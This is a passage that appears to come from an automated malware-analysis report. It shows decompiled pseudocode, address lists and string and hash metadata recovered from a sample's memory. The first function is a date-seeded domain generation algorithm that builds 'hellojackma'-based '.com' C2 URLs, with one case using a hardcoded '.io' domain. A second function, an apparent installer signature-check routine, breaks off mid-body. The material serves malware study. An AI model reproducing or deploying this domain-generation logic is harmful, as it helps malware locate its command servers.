                                                                                                                                                                  				char _v500;
                                                                                                                                                                  				char _v528;
                                                                                                                                                                  				char _v556;
                                                                                                                                                                  				char _v584;
                                                                                                                                                                  				char _v612;
                                                                                                                                                                  				char _v640;
                                                                                                                                                                  				char _v668;
                                                                                                                                                                  				signed int _v672;
                                                                                                                                                                  				signed int _v676;
                                                                                                                                                                  				intOrPtr _v680;
                                                                                                                                                                  				intOrPtr _v684;
                                                                                                                                                                  				intOrPtr _v688;
                                                                                                                                                                  				intOrPtr _v692;
                                                                                                                                                                  				signed int _v696;
                                                                                                                                                                  				signed int _v700;
                                                                                                                                                                  				signed int _v704;
                                                                                                                                                                  				signed int _v708;
                                                                                                                                                                  				signed int _v712;
                                                                                                                                                                  				signed int _v716;
                                                                                                                                                                  				signed int _v720;
                                                                                                                                                                  				signed int _v724;
                                                                                                                                                                  				signed int _v728;
                                                                                                                                                                  				signed int _v732;
                                                                                                                                                                  				signed int _v736;
                                                                                                                                                                  				signed int _v740;
                                                                                                                                                                  				signed int _v744;
                                                                                                                                                                  				signed int _v748;
                                                                                                                                                                  				signed int _v752;
                                                                                                                                                                  				signed int _v756;
                                                                                                                                                                  				signed int _v760;
                                                                                                                                                                  				signed int _v764;
                                                                                                                                                                  				signed int _v768;
                                                                                                                                                                  				signed int _v772;
                                                                                                                                                                  				intOrPtr _t224;
                                                                                                                                                                  
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E10023135);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t224;
                                                                                                                                                                  				_v672 = 0;
                                                                                                                                                                  				E10001160( &_v332, __eflags, "http://");
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v304 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v303, 0, 0x103);
                                                                                                                                                                  				_v36.wYear = 0;
                                                                                                                                                                  				_v36.wMonth = 0;
                                                                                                                                                                  				_v36.wDay = 0;
                                                                                                                                                                  				_v36.wMinute = 0;
                                                                                                                                                                  				_v36.wMilliseconds = 0;
                                                                                                                                                                  				GetLocalTime( &_v36);
                                                                                                                                                                  				_v676 = _a8;
                                                                                                                                                                  				_t231 = _v676 - 6;
                                                                                                                                                                  				if(_v676 <= 6) {
                                                                                                                                                                  					switch( *((intOrPtr*)(_v676 * 4 +  &M10022CD8))) {
                                                                                                                                                                  						case 0:
                                                                                                                                                                  							_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                                  							E1000CCA3(_t222,  &_v304, "hellojackma%04d%02d", _v36.wYear & 0x0000ffff);
                                                                                                                                                                  							_v20 = E1001A4E0(__ebx,  &_v304, _t222, __esi, _t231,  &_v304);
                                                                                                                                                                  							_v680 = E10001160( &_v360, _t231, _v20);
                                                                                                                                                                  							_v684 = _v680;
                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                  							E10001A90( &_v332, _v684);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							E100011A0( &_v360);
                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                  							E1000CA40(__ebx, _t222, __esi, _t231);
                                                                                                                                                                  							_v688 = E10001160( &_v388, _t231, ".com/");
                                                                                                                                                                  							_v692 = _v688;
                                                                                                                                                                  							_v8 = 2;
                                                                                                                                                                  							E10001A90( &_v332, _v692);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							E100011A0( &_v388);
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						case 1:
                                                                                                                                                                  							__eax = _v36.wMonth & 0x0000ffff;
                                                                                                                                                                  							_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                                  							__ecx = _v36.wYear & 0x0000ffff;
                                                                                                                                                                  							__edx =  &_v304;
                                                                                                                                                                  							E1000CCA3(__edi, __edx, "hellojackma%04d%02d1", _v36.wYear & 0x0000ffff) =  &_v304;
                                                                                                                                                                  							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
                                                                                                                                                                  							__ecx = _v20;
                                                                                                                                                                  							__ecx =  &_v416;
                                                                                                                                                                  							_v696 = E10001160( &_v416, __eflags, _v20);
                                                                                                                                                                  							__edx = _v696;
                                                                                                                                                                  							_v700 = _v696;
                                                                                                                                                                  							_v8 = 3;
                                                                                                                                                                  							__eax = _v700;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v700);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v416;
                                                                                                                                                                  							__eax = E100011A0( &_v416);
                                                                                                                                                                  							__ecx = _v20;
                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                  							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  							__esp = __esp + 4;
                                                                                                                                                                  							__ecx =  &_v444;
                                                                                                                                                                  							_v704 = E10001160( &_v444, __eflags, ".com/");
                                                                                                                                                                  							__edx = _v704;
                                                                                                                                                                  							_v708 = _v704;
                                                                                                                                                                  							_v8 = 4;
                                                                                                                                                                  							__eax = _v708;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v708);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v444;
                                                                                                                                                                  							__eax = E100011A0(__ecx);
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						case 2:
                                                                                                                                                                  							__ecx = _v36.wMonth & 0x0000ffff;
                                                                                                                                                                  							_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                                  							__edx = _v36.wYear & 0x0000ffff;
                                                                                                                                                                  							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d2", __edx);
                                                                                                                                                                  							__ecx =  &_v304;
                                                                                                                                                                  							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
                                                                                                                                                                  							__edx = _v20;
                                                                                                                                                                  							__ecx =  &_v472;
                                                                                                                                                                  							_v712 = E10001160( &_v472, __eflags, _v20);
                                                                                                                                                                  							__eax = _v712;
                                                                                                                                                                  							_v716 = _v712;
                                                                                                                                                                  							_v8 = 5;
                                                                                                                                                                  							__ecx = _v716;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v716);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v472;
                                                                                                                                                                  							__eax = E100011A0( &_v472);
                                                                                                                                                                  							__edx = _v20;
                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                  							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  							__esp = __esp + 4;
                                                                                                                                                                  							__ecx =  &_v500;
                                                                                                                                                                  							_v720 = E10001160( &_v500, __eflags, ".com/");
                                                                                                                                                                  							__eax = _v720;
                                                                                                                                                                  							_v724 = _v720;
                                                                                                                                                                  							_v8 = 6;
                                                                                                                                                                  							__ecx = _v724;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v724);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v500;
                                                                                                                                                                  							__eax = E100011A0(__ecx);
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						case 3:
                                                                                                                                                                  							__edx = _v36.wMonth & 0x0000ffff;
                                                                                                                                                                  							_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                                  							__eax = _v36.wYear & 0x0000ffff;
                                                                                                                                                                  							__ecx =  &_v304;
                                                                                                                                                                  							__eax = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d3", _v36.wYear & 0x0000ffff);
                                                                                                                                                                  							__edx =  &_v304;
                                                                                                                                                                  							_v20 = E1001A4E0(__ebx,  &_v304, __edi, __esi, __eflags,  &_v304);
                                                                                                                                                                  							__eax = _v20;
                                                                                                                                                                  							__ecx =  &_v528;
                                                                                                                                                                  							_v728 = E10001160( &_v528, __eflags, _v20);
                                                                                                                                                                  							__ecx = _v728;
                                                                                                                                                                  							_v732 = _v728;
                                                                                                                                                                  							_v8 = 7;
                                                                                                                                                                  							__edx = _v732;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v732);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v528;
                                                                                                                                                                  							E100011A0( &_v528) = _v20;
                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                  							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  							__esp = __esp + 4;
                                                                                                                                                                  							__ecx =  &_v556;
                                                                                                                                                                  							_v736 = E10001160( &_v556, __eflags, ".com/");
                                                                                                                                                                  							__ecx = _v736;
                                                                                                                                                                  							_v740 = _v736;
                                                                                                                                                                  							_v8 = 8;
                                                                                                                                                                  							__edx = _v740;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v740);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v556;
                                                                                                                                                                  							__eax = E100011A0(__ecx);
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						case 4:
                                                                                                                                                                  							__eax = _v36.wMonth & 0x0000ffff;
                                                                                                                                                                  							_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                                  							__ecx = _v36.wYear & 0x0000ffff;
                                                                                                                                                                  							__edx =  &_v304;
                                                                                                                                                                  							E1000CCA3(__edi, __edx, "hellojackma%04d%02d4", _v36.wYear & 0x0000ffff) =  &_v304;
                                                                                                                                                                  							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
                                                                                                                                                                  							__ecx = _v20;
                                                                                                                                                                  							__ecx =  &_v584;
                                                                                                                                                                  							_v744 = E10001160( &_v584, __eflags, _v20);
                                                                                                                                                                  							__edx = _v744;
                                                                                                                                                                  							_v748 = _v744;
                                                                                                                                                                  							_v8 = 9;
                                                                                                                                                                  							__eax = _v748;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v748);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v584;
                                                                                                                                                                  							__eax = E100011A0( &_v584);
                                                                                                                                                                  							__ecx = _v20;
                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                  							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  							__esp = __esp + 4;
                                                                                                                                                                  							__ecx =  &_v612;
                                                                                                                                                                  							_v752 = E10001160( &_v612, __eflags, ".com/");
                                                                                                                                                                  							__edx = _v752;
                                                                                                                                                                  							_v756 = _v752;
                                                                                                                                                                  							_v8 = 0xa;
                                                                                                                                                                  							__eax = _v756;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v756);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v612;
                                                                                                                                                                  							__eax = E100011A0(__ecx);
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						case 5:
                                                                                                                                                                  							__ecx = _v36.wMonth & 0x0000ffff;
                                                                                                                                                                  							_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                                  							__edx = _v36.wYear & 0x0000ffff;
                                                                                                                                                                  							 &_v304 = E1000CCA3(__edi,  &_v304, "hellojackma%04d%02d5", __edx);
                                                                                                                                                                  							__ecx =  &_v304;
                                                                                                                                                                  							_v20 = E1001A4E0(__ebx, __edx, __edi, __esi, __eflags,  &_v304);
                                                                                                                                                                  							__edx = _v20;
                                                                                                                                                                  							__ecx =  &_v640;
                                                                                                                                                                  							_v760 = E10001160( &_v640, __eflags, _v20);
                                                                                                                                                                  							__eax = _v760;
                                                                                                                                                                  							_v764 = _v760;
                                                                                                                                                                  							_v8 = 0xb;
                                                                                                                                                                  							__ecx = _v764;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v764);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v640;
                                                                                                                                                                  							__eax = E100011A0( &_v640);
                                                                                                                                                                  							__edx = _v20;
                                                                                                                                                                  							_push(_v20);
                                                                                                                                                                  							__eax = E1000CA40(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                  							__esp = __esp + 4;
                                                                                                                                                                  							__ecx =  &_v668;
                                                                                                                                                                  							_v768 = E10001160( &_v668, __eflags, ".com/");
                                                                                                                                                                  							__eax = _v768;
                                                                                                                                                                  							_v772 = _v768;
                                                                                                                                                                  							_v8 = 0xc;
                                                                                                                                                                  							__ecx = _v772;
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001A90( &_v332, _v772);
                                                                                                                                                                  							_v8 = 0;
                                                                                                                                                                  							__ecx =  &_v668;
                                                                                                                                                                  							__eax = E100011A0(__ecx);
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  						case 6:
                                                                                                                                                                  							__ecx =  &_v332;
                                                                                                                                                                  							__eax = E10001AB0(__ecx, __eflags, "back19e64ea00d6ecfe1.io/");
                                                                                                                                                                  							goto L9;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				L9:
                                                                                                                                                                  				E10001110(_a4, _t231,  &_v332);
                                                                                                                                                                  				_v672 = _v672 | 0x00000001;
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				E100011A0( &_v332);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}

















































                                                                                                                                                                  0x10022938
                                                                                                                                                                  0x1002293d
                                                                                                                                                                  0x10022941
                                                                                                                                                                  0x10022947
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022951
                                                                                                                                                                  0x10022955
                                                                                                                                                                  0x10022956
                                                                                                                                                                  0x10022967
                                                                                                                                                                  0x1002296f
                                                                                                                                                                  0x1002297e
                                                                                                                                                                  0x10022981
                                                                                                                                                                  0x10022985
                                                                                                                                                                  0x10022990
                                                                                                                                                                  0x10022996
                                                                                                                                                                  0x1002299c
                                                                                                                                                                  0x100229a2
                                                                                                                                                                  0x100229a6
                                                                                                                                                                  0x100229ad
                                                                                                                                                                  0x100229b3
                                                                                                                                                                  0x100229b8
                                                                                                                                                                  0x100229bc
                                                                                                                                                                  0x100229c2
                                                                                                                                                                  0x100229c7
                                                                                                                                                                  0x100229ca
                                                                                                                                                                  0x100229cb
                                                                                                                                                                  0x100229d0
                                                                                                                                                                  0x100229d8
                                                                                                                                                                  0x100229e3
                                                                                                                                                                  0x100229e9
                                                                                                                                                                  0x100229ef
                                                                                                                                                                  0x100229f5
                                                                                                                                                                  0x100229f9
                                                                                                                                                                  0x10022a00
                                                                                                                                                                  0x10022a06
                                                                                                                                                                  0x10022a0b
                                                                                                                                                                  0x10022a0f
                                                                                                                                                                  0x10022a15
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022a1f
                                                                                                                                                                  0x10022a23
                                                                                                                                                                  0x10022a24
                                                                                                                                                                  0x10022a2e
                                                                                                                                                                  0x10022a35
                                                                                                                                                                  0x10022a3d
                                                                                                                                                                  0x10022a4c
                                                                                                                                                                  0x10022a4f
                                                                                                                                                                  0x10022a53
                                                                                                                                                                  0x10022a5e
                                                                                                                                                                  0x10022a64
                                                                                                                                                                  0x10022a6a
                                                                                                                                                                  0x10022a70
                                                                                                                                                                  0x10022a74
                                                                                                                                                                  0x10022a7b
                                                                                                                                                                  0x10022a81
                                                                                                                                                                  0x10022a86
                                                                                                                                                                  0x10022a8a
                                                                                                                                                                  0x10022a95
                                                                                                                                                                  0x10022a98
                                                                                                                                                                  0x10022a99
                                                                                                                                                                  0x10022a9e
                                                                                                                                                                  0x10022aa6
                                                                                                                                                                  0x10022ab1
                                                                                                                                                                  0x10022ab7
                                                                                                                                                                  0x10022abd
                                                                                                                                                                  0x10022ac3
                                                                                                                                                                  0x10022ac7
                                                                                                                                                                  0x10022ace
                                                                                                                                                                  0x10022ad4
                                                                                                                                                                  0x10022ad9
                                                                                                                                                                  0x10022add
                                                                                                                                                                  0x10022ae3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022aed
                                                                                                                                                                  0x10022af1
                                                                                                                                                                  0x10022af2
                                                                                                                                                                  0x10022afc
                                                                                                                                                                  0x10022b0b
                                                                                                                                                                  0x10022b1a
                                                                                                                                                                  0x10022b1d
                                                                                                                                                                  0x10022b21
                                                                                                                                                                  0x10022b2c
                                                                                                                                                                  0x10022b32
                                                                                                                                                                  0x10022b38
                                                                                                                                                                  0x10022b3e
                                                                                                                                                                  0x10022b42
                                                                                                                                                                  0x10022b49
                                                                                                                                                                  0x10022b4f
                                                                                                                                                                  0x10022b54
                                                                                                                                                                  0x10022b58
                                                                                                                                                                  0x10022b5e
                                                                                                                                                                  0x10022b63
                                                                                                                                                                  0x10022b66
                                                                                                                                                                  0x10022b67
                                                                                                                                                                  0x10022b6c
                                                                                                                                                                  0x10022b74
                                                                                                                                                                  0x10022b7f
                                                                                                                                                                  0x10022b85
                                                                                                                                                                  0x10022b8b
                                                                                                                                                                  0x10022b91
                                                                                                                                                                  0x10022b95
                                                                                                                                                                  0x10022b9c
                                                                                                                                                                  0x10022ba2
                                                                                                                                                                  0x10022ba7
                                                                                                                                                                  0x10022bab
                                                                                                                                                                  0x10022bb1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022bbb
                                                                                                                                                                  0x10022bbf
                                                                                                                                                                  0x10022bc0
                                                                                                                                                                  0x10022bd1
                                                                                                                                                                  0x10022bd9
                                                                                                                                                                  0x10022be8
                                                                                                                                                                  0x10022beb
                                                                                                                                                                  0x10022bef
                                                                                                                                                                  0x10022bfa
                                                                                                                                                                  0x10022c00
                                                                                                                                                                  0x10022c06
                                                                                                                                                                  0x10022c0c
                                                                                                                                                                  0x10022c10
                                                                                                                                                                  0x10022c17
                                                                                                                                                                  0x10022c1d
                                                                                                                                                                  0x10022c22
                                                                                                                                                                  0x10022c26
                                                                                                                                                                  0x10022c2c
                                                                                                                                                                  0x10022c31
                                                                                                                                                                  0x10022c34
                                                                                                                                                                  0x10022c35
                                                                                                                                                                  0x10022c3a
                                                                                                                                                                  0x10022c42
                                                                                                                                                                  0x10022c4d
                                                                                                                                                                  0x10022c53
                                                                                                                                                                  0x10022c59
                                                                                                                                                                  0x10022c5f
                                                                                                                                                                  0x10022c63
                                                                                                                                                                  0x10022c6a
                                                                                                                                                                  0x10022c70
                                                                                                                                                                  0x10022c75
                                                                                                                                                                  0x10022c79
                                                                                                                                                                  0x10022c7f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022c8b
                                                                                                                                                                  0x10022c91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100227ae
                                                                                                                                                                  0x10022c96
                                                                                                                                                                  0x10022ca0
                                                                                                                                                                  0x10022cae
                                                                                                                                                                  0x10022cb4
                                                                                                                                                                  0x10022cc1
                                                                                                                                                                  0x10022ccc
                                                                                                                                                                  0x10022cd6

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _sprintf$LocalTime_memset
                                                                                                                                                                  • String ID: .com/$.com/$.com/$.com/$.com/$hellojackma%04d%02d$hellojackma%04d%02d1$hellojackma%04d%02d2$hellojackma%04d%02d3$hellojackma%04d%02d4$http://
                                                                                                                                                                  • API String ID: 3210278488-2045531967
                                                                                                                                                                  • Opcode ID: ca31bb3747dda2b24ef88613d4a23574554048c90a18ee74a8bd737135967faa
                                                                                                                                                                  • Instruction ID: fb4cb11577b3c86e7dfd5e3107c57607ba699950bdf5b0f3fc4b2b3aa76d18be
                                                                                                                                                                  • Opcode Fuzzy Hash: ca31bb3747dda2b24ef88613d4a23574554048c90a18ee74a8bd737135967faa
                                                                                                                                                                  • Instruction Fuzzy Hash: E3D137B5C012689BEB24DBA4CC85BEEB7B4FF59340F5041D9E10967291EB346B84CF92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E00412B6A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				struct _EXCEPTION_POINTERS _v24;
                                                                                                                                                                  				signed int _v28;
                                                                                                                                                                  				signed short* _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                  				signed int _v52;
                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                  				void* _v68;
                                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                  				void _v92;
                                                                                                                                                                  				signed int _v100;
                                                                                                                                                                  				void* _v104;
                                                                                                                                                                  				intOrPtr _v108;
                                                                                                                                                                  				signed short* _v112;
                                                                                                                                                                  				void* _v116;
                                                                                                                                                                  				intOrPtr _v120;
                                                                                                                                                                  				void _v128;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t64;
                                                                                                                                                                  				void* _t69;
                                                                                                                                                                  				signed short* _t72;
                                                                                                                                                                  				signed short _t74;
                                                                                                                                                                  				signed short _t77;
                                                                                                                                                                  				signed short _t78;
                                                                                                                                                                  				signed short _t92;
                                                                                                                                                                  				signed short _t103;
                                                                                                                                                                  				void* _t107;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  				signed short _t110;
                                                                                                                                                                  				signed short _t111;
                                                                                                                                                                  				intOrPtr _t112;
                                                                                                                                                                  				intOrPtr _t114;
                                                                                                                                                                  				signed int _t116;
                                                                                                                                                                  				void* _t124;
                                                                                                                                                                  				void* _t127;
                                                                                                                                                                  				signed short _t136;
                                                                                                                                                                  				signed short _t139;
                                                                                                                                                                  				signed short _t142;
                                                                                                                                                                  				signed short _t145;
                                                                                                                                                                  				signed int _t146;
                                                                                                                                                                  
                                                                                                                                                                  				_t64 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t64 ^ _t146;
                                                                                                                                                                  				_t112 = _a12;
                                                                                                                                                                  				_t128 = _a8;
                                                                                                                                                                  				_push(0x30);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v92);
                                                                                                                                                                  				_v44 = _a8;
                                                                                                                                                                  				_v40 = _t112;
                                                                                                                                                                  				E004267C0(_t112, __ecx, _t124, _a8, __eflags);
                                                                                                                                                                  				_t116 = 9;
                                                                                                                                                                  				_t69 = memset( &_v128, 0, _t116 << 2);
                                                                                                                                                                  				_v32 = _t69;
                                                                                                                                                                  				_v36 = _t69;
                                                                                                                                                                  				_v28 = _t69;
                                                                                                                                                                  				_t127 = _t69;
                                                                                                                                                                  				_v24 = 0xaac56b;
                                                                                                                                                                  				_v20 = 0x11d0cd44;
                                                                                                                                                                  				_v16 = 0xc000c28c;
                                                                                                                                                                  				_v12 = 0xee95c24f;
                                                                                                                                                                  				if(E00433F88( &_v32, _t128, 0) >= 0) {
                                                                                                                                                                  					_t72 = _v32;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						__eflags = 0 -  *_t72;
                                                                                                                                                                  						if(0 ==  *_t72) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						 *_t72 =  *_t72 + 0x20;
                                                                                                                                                                  						__eflags =  *_t72;
                                                                                                                                                                  						_t72 =  &(_t72[1]);
                                                                                                                                                                  					}
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					_push( &_v28);
                                                                                                                                                                  					_push(_t112);
                                                                                                                                                                  					L0042FF8E();
                                                                                                                                                                  					_t74 = GetLastError();
                                                                                                                                                                  					__eflags = _t74 - 0x7a;
                                                                                                                                                                  					if(_t74 != 0x7a) {
                                                                                                                                                                  						__eflags = _t74;
                                                                                                                                                                  						if(_t74 == 0) {
                                                                                                                                                                  							goto L11;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							__eflags = _t74;
                                                                                                                                                                  							_t142 =  <=  ? _t74 : _t74 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t107 = 0x80004005;
                                                                                                                                                                  							__eflags = _t142;
                                                                                                                                                                  							_t133 =  >=  ? 0x80004005 : _t142;
                                                                                                                                                                  							_push(_t133);
                                                                                                                                                                  							_push(0x67b);
                                                                                                                                                                  							goto L8;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t109 = E00431078(_v28, 1);
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_t127 = _t109;
                                                                                                                                                                  						_push(_t127);
                                                                                                                                                                  						_t110 =  &_v28;
                                                                                                                                                                  						_push(_t110);
                                                                                                                                                                  						_push(_t112);
                                                                                                                                                                  						L0042FF8E();
                                                                                                                                                                  						__eflags = _t110;
                                                                                                                                                                  						if(_t110 != 0) {
                                                                                                                                                                  							L11:
                                                                                                                                                                  							_t113 = 1 + _v28 * 2;
                                                                                                                                                                  							_t77 = E00433BDF( &_v36, 1 + _v28 * 2);
                                                                                                                                                                  							__eflags = _t77;
                                                                                                                                                                  							if(_t77 >= 0) {
                                                                                                                                                                  								_t78 = E004344B6(0, _t127, _v28, _v36, _t113);
                                                                                                                                                                  								__eflags = _t78;
                                                                                                                                                                  								if(_t78 >= 0) {
                                                                                                                                                                  									_v68 =  &_v128;
                                                                                                                                                                  									_v100 = _v28;
                                                                                                                                                                  									_v108 = _v40;
                                                                                                                                                                  									_v116 = _v36;
                                                                                                                                                                  									_v112 = _v32;
                                                                                                                                                                  									_t114 = 2;
                                                                                                                                                                  									_v92 = 0x30;
                                                                                                                                                                  									_v80 = _t114;
                                                                                                                                                                  									_v72 = _t114;
                                                                                                                                                                  									_v64 = 1;
                                                                                                                                                                  									_v52 = 0x80;
                                                                                                                                                                  									_v128 = 0x24;
                                                                                                                                                                  									_v104 = _t127;
                                                                                                                                                                  									_v120 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
                                                                                                                                                                  									_t133 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
                                                                                                                                                                  									__eflags = _t133;
                                                                                                                                                                  									if(_t133 == 0) {
                                                                                                                                                                  										L18:
                                                                                                                                                                  										_v64 = _t114;
                                                                                                                                                                  										_t92 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
                                                                                                                                                                  										__eflags = _t92;
                                                                                                                                                                  										if(_t92 != 0) {
                                                                                                                                                                  											__eflags = _t92;
                                                                                                                                                                  											_t136 =  <=  ? _t92 : _t92 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											__eflags = _t136;
                                                                                                                                                                  											_t133 =  >=  ? 0x80004005 : _t136;
                                                                                                                                                                  											E004300D9(0x80004005, "cache.cpp", 0x6a6, _t133);
                                                                                                                                                                  											_push("Could not close verify handle.");
                                                                                                                                                                  											goto L20;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_v52 = _v52 | 0x00001000;
                                                                                                                                                                  										_t103 = WinVerifyTrust(0xffffffff,  &_v24,  &_v92);
                                                                                                                                                                  										__eflags = _t103;
                                                                                                                                                                  										if(_t103 == 0) {
                                                                                                                                                                  											goto L18;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											__eflags = _t103;
                                                                                                                                                                  											_t139 =  <=  ? _t103 : _t103 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											__eflags = _t139;
                                                                                                                                                                  											_t133 =  >=  ? 0x80004005 : _t139;
                                                                                                                                                                  											E004300D9(0x80004005, "cache.cpp", 0x6a0,  >=  ? 0x80004005 : _t139);
                                                                                                                                                                  											E00430A57( >=  ? 0x80004005 : _t139, "Could not verify file %ls.", _v44);
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("Failed to encode file hash.");
                                                                                                                                                                  									goto L20;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to allocate string.");
                                                                                                                                                                  								goto L20;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t111 = GetLastError();
                                                                                                                                                                  							__eflags = _t111;
                                                                                                                                                                  							_t145 =  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t107 = 0x80004005;
                                                                                                                                                                  							__eflags = _t145;
